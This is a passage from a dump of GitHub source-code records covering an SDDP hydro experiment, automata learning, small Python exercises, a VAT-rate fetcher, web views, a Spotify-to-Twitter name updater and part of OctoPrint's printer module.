test_indeces = set(range(len(RHSnoise_density[0]))) - train_indeces\n assert len(train_indeces.intersection(test_indeces))==0, 'Not disjoint'\n \n l_train = list(train_indeces)\n l_train.sort()\n RHSnoise = RHSnoise_density[:,l_train]\n dim_p = len(RHSnoise[0]) \n q_prob = 1/len(RHSnoise[0])\n \n initial_inflow = np.array(hydro_instance.inital_inflows)[:,0:nr]\n valley_turbines = Turbine([50, 60, 70], [55, 65, 70])\n \n \n #For out of sample performance measure\n l_test = list(test_indeces) \n l_test.sort()\n RHSnoise_oos = RHSnoise_density#[:,l_test]\n valley_chain_oos = [Reservoir(30, 200, 50, valley_turbines, Water_Penalty, x) for x in RHSnoise_oos]\n out_of_sample_rnd_cont = random_builder_out_of_sample(valley_chain_oos)\n \n prices = [10+round(5*np.sin(x),2) for x in range(0,T)]\n\n '''\n Wasserstein DUS Experiment 3\n Uses data points for origins and continuum support for destinations. Inner max problem\n is dualized to form a series of single-level problems. 
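\n\n    Schematically, this is the standard Wasserstein-DRO duality (stated here as\n    background; the exact reformulation used by DistRobustWassersteinCont may\n    differ in detail). For a stage cost h, ground metric d, radius r and\n    empirical points xi_1..xi_N:\n\n        sup_{Q : W(Q, P_N) <= r} E_Q[ h(xi) ]\n          = min_{lambda >= 0}  lambda*r + (1/N) * sum_i sup_xi [ h(xi) - lambda*d(xi, xi_i) ]\n\n    so each of the N data points contributes one single-level subproblem over\n    the continuum support.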
\n '''\n valley_chain = [Reservoir(30, 200, 50, valley_turbines, Water_Penalty, x) for x in RHSnoise]\n SDDP.options['multicut'] = True\n SDDP.options['dynamic_sampling'] = True\n rr = dro_radius\n instance_name = \"Hydro_R%i_AR%i_T%i_I%i_N%iESS_WC_%.5f\" % (nr, lag, T, SDDP.options['max_iter'], len(valley_chain[0].inflows), rr)\n #supp_ctrs = [{'innovations[%i]' %(resv):1 for resv in range(nr)} , {'innovations[%i]' %(resv):-1 for resv in range(nr)}]\n #supp_rhs = [RHSnoise_wasswer.sum(axis=0).max(), -(RHSnoise_wasswer.sum(axis=0).min())] \n supp_ctrs = [{'innovations[%i]' %(resv):1} for resv in range(nr)]\n supp_ctrs.extend(({'innovations[%i]' %(resv):-1}) for resv in range(nr))\n supp_rhs = [RHSnoise[resv].max() for resv in range(nr)] \n supp_rhs.extend((-RHSnoise[resv].min() for resv in range(nr))) \n algo = SDDP(T, model_builder, random_builder, risk_measure = DistRobustWassersteinCont, radius = rr, support_ctrs = supp_ctrs, support_rhs = supp_rhs)\n lbs = algo.run(instance_name=instance_name, dynamic_sampling=SDDP.options['dynamic_sampling'])\n \n sim_result = algo.simulate_policy(SDDP.options['sim_iter'], out_of_sample_rnd_cont)\n save_path = hydro_path+'/Output/WassersteinCont/%s_OOS.pickle' %(instance_name)\n write_object_results(save_path, sim_result)\n save_path = hydro_path+'/Output/DisceteWassersteinSingleCut/%s_LBS.pickle' %(instance_name)\n write_object_results(save_path, (algo.instance, lbs)) \n \n del(algo)\n \n \n","repo_name":"dukduque/SDDPpy","sub_path":"HydroExamples/Hydro_ARx_WassersteinCont.py","file_name":"Hydro_ARx_WassersteinCont.py","file_ext":"py","file_size_in_byte":11426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"40920616159","text":"import itertools\nfrom collections import deque\n\n# +----------------------------------------------------------------------------\n# | pylstar Imports\n# +----------------------------------------------------------------------------\nfrom pylstar.tools.Decorators import PylstarLogger\nfrom pylstar.Word import Word\nfrom pylstar.Letter import EmptyLetter\nfrom pylstar.OutputQuery import OutputQuery\n\n\n@PylstarLogger\nclass WpMethodEQ(object):\n \"\"\"WPmethod algorithm used to trigger an equivalence query\"\"\"\n\n def __init__(self, knowledge_base, max_states, input_letters):\n self.knowledge_base = knowledge_base\n self.max_states = max_states\n self.input_letters = input_letters\n\n def find_counterexample(self, hypothesis):\n if hypothesis is None:\n raise Exception(\"Hypothesis cannot be None\")\n\n W = []\n\n states = hypothesis.get_states()\n \n # compute all couples of states\n state_couples = itertools.combinations(states, 2)\n\n # Constructing the characterization set W of the hypothesis\n for couple in state_couples:\n # Computes a distinguishing string for each couple of state\n W.append(self.__compute_distinguishable_string(hypothesis, couple))\n\n # computes P\n P = self.__computesP(hypothesis)\n self._logger.debug(\"P= {}\".format(P))\n\n # computes Z\n Z = self.__computesZ(hypothesis, W)\n self._logger.debug(\"Z= {}\".format(Z))\n\n # T = P . 
Z\n T = P + Z\n self._logger.debug(\"T={}\".format(T))\n\n # check if one of the computed testcase highlights a counterexample\n for i_testcase, testcase_query in enumerate(T[1:]):\n self._logger.debug(\"Executing testcase {}/{} : {}\".format(i_testcase, len(T)-1, testcase_query))\n\n # computes the hypothesis output\n hypothesis_output_word = hypothesis.play_query(testcase_query)[0]\n\n self.knowledge_base.resolve_query(testcase_query)\n real_output_word = testcase_query.output_word\n\n self._logger.debug(real_output_word)\n self._logger.debug(hypothesis_output_word)\n if real_output_word != hypothesis_output_word:\n return testcase_query\n return None\n\n def __computesZ(self, hypothesis, W): \n \"\"\"it follows the formula Z= W U (X^1.W) U .... U (X^(m-1-n).W) U (W^(m-n).W)\n\n \"\"\"\n if hypothesis is None:\n raise Exception(\"Hypothesis cannot be None\")\n if W is None:\n raise Exception(\"W cannot be None\")\n \n self._logger.debug(\"Computing Z\")\n\n Z = []\n Z.extend(W)\n \n states = hypothesis.get_states()\n v = self.max_states - len(states)\n if v < 0:\n v = 0\n self._logger.debug(\"V= {}\".format(v))\n\n output_queries = []\n for input_letter in self.input_letters:\n output_query = OutputQuery(word = Word([input_letter]))\n output_queries.append(output_query)\n\n X = dict()\n X[0] = W\n for i in range(1, v+1):\n self._logger.debug(\"Computing X^{}\".format(i))\n X[i] = []\n previous_X = X[i-1]\n for x in previous_X:\n X[i].extend(x.multiply(output_queries))\n for w in W:\n for xi in X[i]:\n if not xi in Z:\n Z.append(xi)\n\n return Z\n\n def __computesP(self, hypothesis):\n if hypothesis is None:\n raise Exception(\"Hypothesis cannot be None\")\n self._logger.debug(\"Computing P\")\n\n P = []\n \n empty_word = Word([EmptyLetter()])\n current_query = OutputQuery(empty_word)\n P.append(current_query)\n\n open_queries = deque([current_query])\n close_queries = []\n\n seen_states = set([hypothesis.initial_state])\n while len(open_queries) > 0:\n query = open_queries.popleft()\n tmp_seen_states = set()\n\n for letter in self.input_letters:\n new_word = query.input_word + Word([letter])\n query_z = OutputQuery(new_word)\n (output_word, visited_states) = hypothesis.play_query(query_z)\n close_queries.append(query_z)\n \n if visited_states[-1] not in seen_states:\n tmp_seen_states.add(visited_states[-1])\n open_queries.append(query_z)\n\n seen_states.update(tmp_seen_states)\n\n P.extend(close_queries)\n\n return P\n \n def __compute_distinguishable_string(self, hypothesis, couple):\n self._logger.debug(\"Computes the distinguishable string for state couple '{}'\".format(couple))\n if hypothesis is None:\n raise Exception(\"Hypothesis cannot be None\")\n if couple is None:\n raise Exception(\"couple cannot be None\")\n \n self._logger.debug(\"Computing distinguishing strings for states {}\".format(couple))\n queries_to_test = deque([])\n \n empty_word = Word([EmptyLetter()])\n z_query = OutputQuery(empty_word)\n for letter in self.input_letters:\n new_word = z_query.input_word + Word([letter])\n queries_to_test.append(OutputQuery(new_word))\n\n distinguishable_query = z_query\n\n done = False\n i = 0\n while not done:\n query = queries_to_test.popleft()\n if i > self.max_states * self.max_states:\n break\n\n if not self.__is_distinguishable_states(hypothesis, query, couple):\n done = False\n for letter in self.input_letters:\n new_query = OutputQuery(query.input_word + Word([letter]))\n queries_to_test.append(new_query)\n else:\n done = True\n distinguishable_query = query\n\n i = i + 
1\n\n return distinguishable_query\n \n def __is_distinguishable_states(self, hypothesis, query, couple):\n if hypothesis is None:\n raise Exception(\"Hypothesis cannot be None\")\n if query is None:\n raise Exception(\"query cannot be None\")\n if couple is None:\n raise Exception(\"couple cannot be None\")\n\n output_word_state0 = hypothesis.play_word(query.input_word, couple[0])[0]\n output_word_state1 = hypothesis.play_word(query.input_word, couple[1])[0]\n \n return output_word_state0 != output_word_state1\n\n","repo_name":"gbossert/pylstar","sub_path":"src/pylstar/eqtests/WpMethodEQ.py","file_name":"WpMethodEQ.py","file_ext":"py","file_size_in_byte":6551,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"96"} +{"seq_id":"2911327770","text":"class nodo():\r\n def __init__(self,dato):\r\n self.valor=dato\r\n self.left=None\r\n self.right=None\r\n\r\ndef preorder(node):\r\n if node:\r\n print(node.valor,end=\"-\")\r\n preorder(node.left)\r\n preorder(node.right)\r\ndef inorder(node):\r\n if node:\r\n preorder(node.left)\r\n print(node.valor,end=\"-\")\r\n preorder(node.right)\r\ndef postorder(node):\r\n if node:\r\n preorder(node.left)\r\n preorder(node.right)\r\n print(node.valor,end=\"-\")\r\ndef altura(node):\r\n if node is None:\r\n return 0\r\n return 1 + max(altura(node.left), altura(node.right))\r\n\r\ndef numNodos(node):\r\n if node is None:\r\n return 0\r\n else:\r\n return 1+numNodos(node.left)+numNodos(node.right)\r\n#..........................\r\n\r\na=nodo(50) #Nodo Raiz\r\nprint(a.left,a.valor,a.right)\r\n\r\nai=nodo(100)\r\nad=nodo(200)\r\n\r\na.left=ai\r\na.right=ad\r\nprint(a.left.valor,a.valor,a.right.valor)\r\n\r\n\r\nad.left=nodo('A')\r\nad.right=nodo('B')\r\na.right.left=nodo('A')\r\na.right.right=nodo('B')\r\nprint(a.right.left.valor,a.right.valor,a.right.right.valor)\r\n\r\na.right.left.left=nodo('Z')\r\nprint(a.right.left.left.valor,a.right.left.valor)\r\n\r\na.right.left.left.left=nodo(8)\r\na.right.left.left.right=nodo(9)\r\nprint(a.right.left.left.left.valor,a.right.left.left.valor,a.right.left.left.right.valor)\r\n\r\n# print(\"postorder\")\r\n# postorder(a)\r\n# print()\r\n\r\n# print (\"inorder\")\r\n# inorder(a)\r\n# print()\r\n\r\n# print(\"preorder\")\r\n# preorder(a)\r\n\r\nprint(\"altura:\",altura(a))\r\n\r\n\r\ndef numNodos(node):\r\n if node is None:\r\n return 0\r\n else:\r\n return 1+numNodos(node.left)+numNodos(node.right)\r\nprint(\"nodos\",numNodos(a))\r\n","repo_name":"Zentenoo/Practicas-con-Python","sub_path":"python/arboles.py","file_name":"arboles.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"26301060651","text":"import dis\n\nclass FirstSingleton:\n\n __instance = None\n\n def __init__(self):\n if FirstSingleton.__instance != None:\n raise \"Error\"\n else:\n FirstSingleton.__instance = self\n\n @staticmethod\n def getInstance():\n if FirstSingleton.__instance == None:\n FirstSingleton()\n return FirstSingleton.__instance\n\n def doSomething(self):\n self.location = \"\"\n \n\nclass SecondSingleton:\n\n __instance = None\n\n def __init__(self):\n if SecondSingleton.__instance != None:\n raise \"Error\"\n else:\n SecondSingleton.__instance = self\n\n @classmethod\n def getInstance(cls):\n if cls.__instance == None:\n cls()\n return cls.__instance\n\n def doSomething(self):\n self.location = 
\"\"\n\nprint(\"FirstSingleton\")\nprint(dis.disco(FirstSingleton))\nprint(\"SecondSingleton\")\nprint(dis.disco(SecondSingleton))","repo_name":"charlesemurray/DesignPatternProblems","sub_path":"class_tests.py","file_name":"class_tests.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"11881385590","text":"from typing import Union, Optional, List, Dict\nimport requests\nimport datetime\nimport decimal\nimport json\n\nfrom eurovat.states import EUState, states\nfrom eurovat.rate import VatRate, VatRules\n\nquery_url = \"https://ec.europa.eu/taxation_customs/tedb/vatSearchResult.json\"\ndateformat = \"%Y/%m/%d\"\n\ndef get_rates(countries: List[Union[str, EUState]], date_from: Optional[datetime.date]=None, date_to: Optional[datetime.date]=None) -> List[VatRules]:\n countries_lst = []\n\n for country in countries:\n if isinstance(country, EUState):\n countries_lst.append(country.msa_id)\n else:\n countries_lst.append(EUState.get(country).msa_id)\n\n if date_to is None:\n date_to = datetime.date.today()\n\n if date_from is None:\n date_from_str = \"\"\n else:\n date_from_str = date_from.strftime(dateformat)\n\n request = requests.post(\n url=query_url,\n params={\n \"selectedMemberStates\": countries_lst,\n \"dateFrom\": date_from_str.encode(),\n \"dateTo\": date_to.strftime(dateformat).encode()\n })\n \n data = request.json()\n\n rates: Dict[str, List[VatRate]] = {}\n \n for row in data:\n assert row[\"type\"] in (\"STANDARD\", \"REDUCED\")\n country_code = row[\"memberState\"][\"defaultCountryCode\"]\n reduced = row[\"type\"] != \"STANDARD\"\n rate = decimal.Decimal(row[\"rate\"][\"value\"])\n\n cn_codes = [\n code[\"key\"][\"code\"]\n for code in row[\"cnCodes\"]\n ]\n\n cpa_codes = [\n code[\"key\"][\"code\"]\n for code in row[\"cpaCodes\"]\n\n ]\n\n start_date = row[\"situationOn\"]\n\n rates.setdefault(country_code, [])\n rates[country_code].append(\n VatRate(\n reduced=reduced,\n rate = rate,\n situation_on=start_date/1000,\n cn_codes = cn_codes,\n cpa_codes = cpa_codes,\n category = row[\"category\"],\n description = row[\"comments\"] or \"\"\n )\n )\n \n # WORKAROUND for missing rule:\n rates[\"DE\"].append(VatRate(\n reduced=False,\n rate=decimal.Decimal(\"16\"),\n cn_codes=[],\n cpa_codes=[],\n situation_on=datetime.datetime(2020, 7, 1).timestamp()\n ))\n\n # canary-islands-reduced rate\n spanish_standard_rates = filter(lambda el: el.reduced==False, rates[\"ES\"])\n for rate_es in spanish_standard_rates:\n if rate_es.description:\n rate_es.reduced = True\n \n return [\n VatRules(EUState.get(country_name), rate_lst)\n \n for country_name, rate_lst in rates.items()\n ]\n","repo_name":"airgproducts/eurovat","sub_path":"eurovat/tedb.py","file_name":"tedb.py","file_ext":"py","file_size_in_byte":2656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"19350342695","text":"from collections import deque\n\nT = int(input())\n\nfor _ in range(T):\n commands = input()\n n = int(input())\n nums = deque(input()[1:-1].split(','))\n\n if n == 0:\n nums = deque()\n\n REVERSED = False\n ERROR = False\n\n for cmd in commands:\n if cmd == 'R':\n REVERSED = not REVERSED\n\n if cmd == 'D':\n if not nums:\n ERROR = True\n break\n if REVERSED:\n nums.pop()\n else:\n nums.popleft()\n\n if ERROR:\n print(\"error\")\n elif REVERSED:\n print('[' + ','.join(list(nums)[::-1]) + ']')\n else:\n print('[' + ','.join(nums) + 
']')\n","repo_name":"JwahoonKim/PS","sub_path":"백준/Python/5430.py","file_name":"5430.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"32096727521","text":"\"\"\"\nLogin view\n\nViewset to user serializer\n\"\"\"\n\n# Django Rest Framework\nfrom rest_framework.generics import CreateAPIView\nfrom rest_framework.response import Response\n\n# Accounts serializer\nfrom apps.accounts.serializers import (\n LoginSerializer,\n UserSerializer\n)\n\n\nclass LoginView(CreateAPIView):\n \"\"\"\n Login view\n\n Execute the logic to perform the user and client login\n \"\"\"\n serializer_class = LoginSerializer\n\n def create(self, request, *args, **kwargs):\n \"\"\"\n create get user's token\n \"\"\"\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user, token = serializer.save()\n user = UserSerializer(user).data\n data = {\n 'user': user,\n 'token': token\n }\n return Response(data)\n","repo_name":"ivanmtoroc/superdrogas","sub_path":"apps/accounts/viewsets/login_view.py","file_name":"login_view.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"96"} +{"seq_id":"42571528338","text":"import webop\nimport fileop\n\n\ndef main():\n url = input('Nhập link khởi đầu: ')\n count = int(input('Nhập số lượng trang: '))\n waiting_line = webop.lay_cac_duong_link(webop.doc_noi_dung(url), url)\n history = webop.countlink(waiting_line, url, count)\n fileop.thumuc(input('Nhập tên thư mục lưu file: '))\n fileop.luufile(history, count)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"TDMVu18/pythonProject","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"40544153346","text":"from flask import request, render_template, g, flash, redirect, url_for, jsonify\nfrom flask.ext.login import login_required\n\nfrom mysite import app\nfrom mysite.models.board import Board\nfrom mysite.models.list import List\nfrom mysite.api.utils import error, ok\nfrom mysite.api.const import Error\n\n\n@app.route('/board/', methods=['GET', 'POST'])\n@login_required\ndef board():\n if request.method == 'GET':\n board_ids = Board.get_board_ids_by_netid(g.user.netid)\n boards = map(Board.get_board_by_id, board_ids)\n return render_template(\"board.html\", boards=boards)\n else:\n # request.method == 'POST'\n name = request.form.get('name')\n if not name:\n flash(\"Board name can not be empty.\")\n return redirect(url_for('board'))\n Board.add_board(name)\n return redirect(url_for('board'))\n\n\n@app.route(\"/board//\", methods=['GET'])\n@login_required\ndef board_page(board_id):\n if not Board.has_access_to(g.user.netid, board_id):\n return render_template(\"no_access.html\")\n lists = List.get_lists_by_board_id(board_id)\n return render_template(\"board_page.html\", lists=lists)\n\n\n@app.route(\"/board//list/\", methods=['GET', 'POST'])\n@login_required\ndef board_list(board_id):\n \"\"\"\n GET: get all lists of the specified board\n POST: add a list to the specified board\n\n Return JSON.\n \"\"\"\n if request.method == 'GET':\n lists = List.get_lists_by_board_id(board_id)\n return ok({\"lists\": map(lambda x: x.to_dict(), lists)})\n elif request.method == 'POST':\n name = request.form.get(\"name\")\n if not name:\n return error(Error.EMPTY_LIST_NAME, 
400)\n\n if not Board.has_access_to(g.user.netid, board_id):\n return error(Error.NO_ACCESS_TO_BOARD, 400)\n\n list_ = List.add_list(board_id, name)\n return ok({\"created\": True, \"list\": list_.to_dict()})\n","repo_name":"CoCornell/CoCornell","sub_path":"views/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"12737109505","text":"import os\nimport time\nimport signal\nfrom driver.driver import *\n\nglobal user_name\nglobal tweepy_api\n\ndef keyboardInterruptHandler(signal, frame):\n\ttry:\n\t\ttweepy_api.update_profile(name=user_name)\n\t\texit(0)\n\texcept:\n\t\texit(0)\n\nsignal.signal(signal.SIGINT, keyboardInterruptHandler)\n\ntweepy_api = new_tweepy_client()\nspotipy_client = new_spotipy_client()\n\ntry:\n\tscreen_name = tweepy_api.get_settings()[\"screen_name\"]\nexcept: # reset access credential in case of auth failure.\n\tupdate_tweepy_access_token(\"\",\"\")\nprint(screen_name)\nuser = tweepy_api.get_user(screen_name=screen_name)\n\nprint(\"ctrl+c (SIGINT) to stop and get back to original name\")\n\nprevious_name = \"\"\nwhile(1):\n\tuser_name = user._json[\"name\"].split(\"🎵\")[0]\n\ttry:\n\t\tcurrent_play = spotipy_client.current_playback()\n\t\tcurrent_track_name = current_play[\"item\"][\"name\"]\n\t\tcurrent_track_artist_list = current_play[\"item\"][\"artists\"]\n\t\tcurrent_track_artist_name_list = \"\"\n\texcept:\n\t\tprint(\"Can't achieve Nowplaying\")\n\t\ttweepy_api.update_profile(name=user_name)\n\t\ttime.sleep(30)\n\t\tcontinue\n\tfor artist in current_track_artist_list:\n\t\tcurrent_track_artist_name_list +=artist[\"name\"]\n\ttrack_display = current_track_name+\"/\"+current_track_artist_name_list\n\ttarget_name = (user_name+\"🎵\"+track_display)[:50]\n\tif previous_name != target_name:\n\t\tprint(\"Updating to :\",target_name)\n\t\tprevious_name = target_name\n\t\ttweepy_api.update_profile(name=target_name)\t\n\ttime.sleep(30)\n","repo_name":"EBebBeBeb/spotify-with-twitter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9283042000","text":"\"\"\"\nThis module holds the standard implementation of the :class:`PrinterInterface` and it helpers.\n\"\"\"\n\n__author__ = \"Gina Häußge \"\n__license__ = \"GNU Affero General Public License http://www.gnu.org/licenses/agpl.html\"\n__copyright__ = \"Copyright (C) 2014 The OctoPrint Project - Released under terms of the AGPLv3 License\"\n\nimport copy\nimport logging\nimport os\nimport threading\nimport time\n\nfrom frozendict import frozendict\n\nimport octoprint.util.json\nfrom octoprint import util as util\nfrom octoprint.events import Events, eventManager\nfrom octoprint.filemanager import FileDestinations, NoSuchStorage, valid_file_type\nfrom octoprint.plugin import ProgressPlugin, plugin_manager\nfrom octoprint.printer import (\n InvalidFileLocation,\n InvalidFileType,\n PrinterCallback,\n PrinterInterface,\n UnknownScript,\n)\nfrom octoprint.printer.estimation import PrintTimeEstimator\nfrom octoprint.settings import settings\nfrom octoprint.util import InvariantContainer\nfrom octoprint.util import comm as comm\nfrom octoprint.util import get_fully_qualified_classname as fqcn\nfrom octoprint.util import to_unicode\n\n\nclass Printer(PrinterInterface, comm.MachineComPrintCallback):\n \"\"\"\n Default implementation of the 
:class:`PrinterInterface`. Manages the communication layer object and registers\n itself with it as a callback to react to changes on the communication layer.\n \"\"\"\n\n def __init__(self, fileManager, analysisQueue, printerProfileManager):\n from collections import deque\n\n self._logger = logging.getLogger(__name__)\n self._logger_job = logging.getLogger(f\"{__name__}.job\")\n\n self._dict = (\n frozendict\n if settings().getBoolean([\"devel\", \"useFrozenDictForPrinterState\"])\n else dict\n )\n\n self._analysisQueue = analysisQueue\n self._fileManager = fileManager\n self._printerProfileManager = printerProfileManager\n\n self._temps = DataHistory(\n cutoff=settings().getInt([\"temperature\", \"cutoff\"]) * 60\n )\n self._markings = DataHistory(\n cutoff=settings().getInt([\"temperature\", \"cutoff\"]) * 60\n )\n\n self._messages = deque([], 300)\n self._log = deque([], 300)\n\n self._state = None\n\n self._currentZ = None\n\n self._printAfterSelect = False\n self._posAfterSelect = None\n\n self._firmware_info = None\n\n # sd handling\n self._sdPrinting = False\n self._sdStreaming = False\n self._streamingFinishedCallback = None\n self._streamingFailedCallback = None\n\n # job handling & estimation\n self._selectedFileMutex = threading.RLock()\n self._selectedFile = None\n\n self._estimator_factory = PrintTimeEstimator\n self._estimator = None\n analysis_queue_hooks = plugin_manager().get_hooks(\n \"octoprint.printer.estimation.factory\"\n )\n for name, hook in analysis_queue_hooks.items():\n try:\n estimator = hook()\n if estimator is not None:\n self._logger.info(f\"Using print time estimator provided by {name}\")\n self._estimator_factory = estimator\n except Exception:\n self._logger.exception(\n f\"Error while processing analysis queues from {name}\",\n extra={\"plugin\": name},\n )\n\n # hook card upload\n self.sd_card_upload_hooks = plugin_manager().get_hooks(\n \"octoprint.printer.sdcardupload\"\n )\n\n # comm\n self._comm = None\n\n # callbacks\n self._callbacks = []\n\n # progress plugins\n self._lastProgressReport = None\n self._progressPlugins = plugin_manager().get_implementations(ProgressPlugin)\n\n self._additional_data_hooks = plugin_manager().get_hooks(\n \"octoprint.printer.additional_state_data\"\n )\n self._blacklisted_data_hooks = []\n\n self._stateMonitor = StateMonitor(\n interval=0.5,\n on_update=self._sendCurrentDataCallbacks,\n on_add_temperature=self._sendAddTemperatureCallbacks,\n on_add_log=self._sendAddLogCallbacks,\n on_add_message=self._sendAddMessageCallbacks,\n on_get_progress=self._updateProgressDataCallback,\n on_get_resends=self._updateResendDataCallback,\n )\n self._stateMonitor.reset(\n state=self._dict(\n text=self.get_state_string(),\n flags=self._getStateFlags(),\n error=self.get_error(),\n ),\n job_data=self._dict(\n file=self._dict(name=None, path=None, size=None, origin=None, date=None),\n estimatedPrintTime=None,\n lastPrintTime=None,\n filament=self._dict(length=None, volume=None),\n user=None,\n ),\n progress=self._dict(\n completion=None,\n filepos=None,\n printTime=None,\n printTimeLeft=None,\n printTimeOrigin=None,\n ),\n current_z=None,\n offsets=self._dict(),\n resends=self._dict(count=0, ratio=0),\n )\n\n eventManager().subscribe(\n Events.METADATA_ANALYSIS_FINISHED, self._on_event_MetadataAnalysisFinished\n )\n eventManager().subscribe(\n Events.METADATA_STATISTICS_UPDATED, self._on_event_MetadataStatisticsUpdated\n )\n eventManager().subscribe(Events.CHART_MARKED, self._on_event_ChartMarked)\n\n self._handle_connect_hooks = 
plugin_manager().get_hooks(\n \"octoprint.printer.handle_connect\"\n )\n\n def _create_estimator(self, job_type=None):\n if job_type is None:\n with self._selectedFileMutex:\n if self._selectedFile is None:\n return\n\n if self._selectedFile[\"sd\"]:\n job_type = \"sdcard\"\n else:\n job_type = \"local\"\n\n self._estimator = self._estimator_factory(job_type)\n\n @property\n def firmware_info(self):\n return frozendict(self._firmware_info) if self._firmware_info else None\n\n # ~~ handling of PrinterCallbacks\n\n def register_callback(self, callback, *args, **kwargs):\n if not isinstance(callback, PrinterCallback):\n self._logger.warning(\n \"Registering an object as printer callback which doesn't implement the PrinterCallback interface\"\n )\n self._callbacks.append(callback)\n\n def unregister_callback(self, callback, *args, **kwargs):\n try:\n self._callbacks.remove(callback)\n except ValueError:\n # not registered\n pass\n\n def send_initial_callback(self, callback):\n if callback in self._callbacks:\n self._sendInitialStateUpdate(callback)\n\n def _sendAddTemperatureCallbacks(self, data):\n for callback in self._callbacks:\n try:\n callback.on_printer_add_temperature(data)\n except Exception:\n self._logger.exception(\n \"Exception while adding temperature data point to callback {}\".format(\n callback\n ),\n extra={\"callback\": fqcn(callback)},\n )\n\n def _sendAddLogCallbacks(self, data):\n for callback in self._callbacks:\n try:\n callback.on_printer_add_log(data)\n except Exception:\n self._logger.exception(\n \"Exception while adding communication log entry to callback {}\".format(\n callback\n ),\n extra={\"callback\": fqcn(callback)},\n )\n\n def _sendAddMessageCallbacks(self, data):\n for callback in self._callbacks:\n try:\n callback.on_printer_add_message(data)\n except Exception:\n self._logger.exception(\n \"Exception while adding printer message to callback {}\".format(\n callback\n ),\n extra={\"callback\": fqcn(callback)},\n )\n\n def _sendCurrentDataCallbacks(self, data):\n plugin_data = self._get_additional_plugin_data(initial=False)\n for callback in self._callbacks:\n try:\n data_copy = copy.deepcopy(data)\n if plugin_data:\n data_copy.update(plugins=copy.deepcopy(plugin_data))\n callback.on_printer_send_current_data(data_copy)\n except Exception:\n self._logger.exception(\n \"Exception while pushing current data to callback {}\".format(\n callback\n ),\n extra={\"callback\": fqcn(callback)},\n )\n\n def _get_additional_plugin_data(self, initial=False):\n plugin_data = {}\n\n for name, hook in self._additional_data_hooks.items():\n if name in self._blacklisted_data_hooks:\n continue\n try:\n additional = hook(initial=initial)\n if additional and isinstance(additional, dict):\n octoprint.util.json.dumps({name: additional})\n plugin_data[name] = additional\n except ValueError:\n self._logger.exception(\n f\"Invalid additional data from plugin {name}\",\n extra={\"plugin\": name},\n )\n except Exception:\n self._logger.exception(\n \"Error while retrieving additional data from plugin {}, blacklisting it for further loops\".format(\n name\n ),\n extra={\"plugin\": name},\n )\n self._blacklisted_data_hooks.append(name)\n\n return plugin_data\n\n # ~~ callback from metadata analysis event\n\n def _on_event_MetadataAnalysisFinished(self, event, data):\n with self._selectedFileMutex:\n if self._selectedFile:\n self._setJobData(\n self._selectedFile[\"filename\"],\n self._selectedFile[\"filesize\"],\n self._selectedFile[\"sd\"],\n self._selectedFile[\"user\"],\n )\n\n def 
_on_event_MetadataStatisticsUpdated(self, event, data):\n with self._selectedFileMutex:\n if self._selectedFile:\n self._setJobData(\n self._selectedFile[\"filename\"],\n self._selectedFile[\"filesize\"],\n self._selectedFile[\"sd\"],\n self._selectedFile[\"user\"],\n )\n\n # ~~ chart marking insertions\n\n def _on_event_ChartMarked(self, event, data):\n self._markings.append(\n {\n \"type\": data.get(\"type\", \"unknown\"),\n \"label\": data.get(\"label\"),\n \"time\": data.get(\"time\", time.time()),\n }\n )\n\n # ~~ progress plugin reporting\n\n def _reportPrintProgressToPlugins(self, progress):\n with self._selectedFileMutex:\n if (\n progress is None\n or not self._selectedFile\n or \"sd\" not in self._selectedFile\n or \"filename\" not in self._selectedFile\n ):\n return\n\n storage = \"sdcard\" if self._selectedFile[\"sd\"] else \"local\"\n filename = self._selectedFile[\"filename\"]\n\n def call_plugins(storage, filename, progress):\n for plugin in self._progressPlugins:\n try:\n plugin.on_print_progress(storage, filename, progress)\n except Exception:\n self._logger.exception(\n \"Exception while sending print progress to plugin %s\"\n % plugin._identifier,\n extra={\"plugin\": plugin._identifier},\n )\n\n thread = threading.Thread(target=call_plugins, args=(storage, filename, progress))\n thread.daemon = False\n thread.start()\n\n # ~~ PrinterInterface implementation\n\n def connect(self, port=None, baudrate=None, profile=None, *args, **kwargs):\n \"\"\"\n Connects to the printer. If port and/or baudrate is provided, uses these settings, otherwise autodetection\n will be attempted.\n \"\"\"\n if self._comm is not None:\n return\n\n for name, hook in self._handle_connect_hooks.items():\n try:\n if hook(\n self, *args, port=port, baudrate=baudrate, profile=profile, **kwargs\n ):\n self._logger.info(f\"Connect signalled as handled by plugin {name}\")\n return\n except Exception:\n self._logger.exception(\n f\"Exception while handling connect in plugin {name}\",\n extra={\"plugin\": name},\n )\n\n eventManager().fire(Events.CONNECTING)\n self._printerProfileManager.select(profile)\n\n from octoprint.logging.handlers import SerialLogHandler\n\n SerialLogHandler.arm_rollover()\n if not logging.getLogger(\"SERIAL\").isEnabledFor(logging.DEBUG):\n # if serial.log is not enabled, log a line to explain that to reduce \"serial.log is empty\" in tickets...\n logging.getLogger(\"SERIAL\").info(\n \"serial.log is currently not enabled, you can enable it via Settings > Serial Connection > Log communication to serial.log\"\n )\n\n self._firmware_info = None\n self._comm = comm.MachineCom(\n port,\n baudrate,\n callbackObject=self,\n printerProfileManager=self._printerProfileManager,\n )\n self._comm.start()\n\n def disconnect(self, *args, 